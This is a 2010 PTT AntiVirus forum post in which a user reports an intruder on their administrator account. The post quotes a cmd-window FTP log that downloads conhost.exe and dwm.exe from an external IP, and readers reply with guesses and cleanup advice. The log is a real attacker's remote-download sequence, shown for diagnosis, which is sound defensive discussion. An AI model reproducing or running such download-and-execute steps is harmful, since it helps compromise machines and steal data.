作者pobov (不应该存在的执念)
看板AntiVirus
标题一回家发现administrator被登入
时间Fri Jun 4 19:17:50 2010
一回家发现administrator被登入
进去一看,开了cmd视窗,
出现下列文字
Connected to 95.211.131.155.
220 (vsFTPd 2.0.7)
ftp> user anonymous a
331 Please specify the password.
230 Login successful.
ftp> binary
200 Switching to Binary mode.
ftp> literal pasv
227 Entering Passive Mode (95,211,131,155,207,212)
ftp> get Redirect.exe
200 PORT command successful. Consider using PASV.
550 Failed to open file.
ftp> get conhost.exe
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for conhost.exe (0 bytes).
226 File send OK.
ftp> get dwm.exe
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for dwm.exe (69632 bytes).
226 File send OK.
ftp: 69632 bytes received in 1.81Seconds 38.43Kbytes/sec.
ftp> quit
221 Goodbye.
关键字: Redirect.exe conhost.exe dwm.exe
这是那一个病毒吗?
--
[课程]99年度台湾史丹福医疗器材产品设计之人才培训计画
临床培训医学中心课程 (第二年计画)
招生海报、课程表网址:
http://mrilab.mc.ntu.edu.tw/99stb/
--
※ 发信站: 批踢踢实业坊(ptt.cc)
◆ From: 124.218.19.222
1F:推 hirokofan:看起来有抓下来的只有dwn.exe 06/04 23:08
2F:推 bestpika:跑去ftp载下来了,行为看起来只有把dwm.exe加进run而已 06/05 00:03
3F:推 kkhi:系统有大漏洞! administrator都被登入...对方可为所欲为 06/05 02:13
4F:推 chang0206:你的admin帐号该不会没有密码吧? 06/05 18:08
5F:推 hirokofan:照道理administoator就算没密码,XP也不会让人直接进 06/05 20:11
6F:→ cocalady:好像是有木马利用admin暗中下载一些可能作为偷取个资的工 06/06 03:40
7F:→ cocalady:具到C槽中 而下载好的 dwm.exe等等 已被木马利用command 06/06 03:41
8F:→ cocalady:line方式执行了 请搜寻dwm.exe 并用防毒软体判断是否为 06/06 03:43
9F:→ cocalady:spyware等等的东西 06/06 03:44
10F:推 ylok:你可以whois一下IP位置过去和他们反映 是Netherlands 06/06 06:13
11F:→ ylok:当然对方也有可能是殭屍被遥控的电脑 06/06 06:15
12F:→ ylok:不过你电脑会被登入表示主机有防护上漏洞 原PO防火墙防毒有吗 06/06 06:16
13F:→ pobov:防毒是avira小红伞,防火墙被我关掉很久了, 06/06 11:45
14F:→ pobov:有找了dwm.exe删掉。admin密码从控制台重设,就继续用了XD 06/06 11:45
15F:推 ylok:建议要不要防火墙也开了? 然後全机扫瞄一下找有没有Malware 06/06 13:00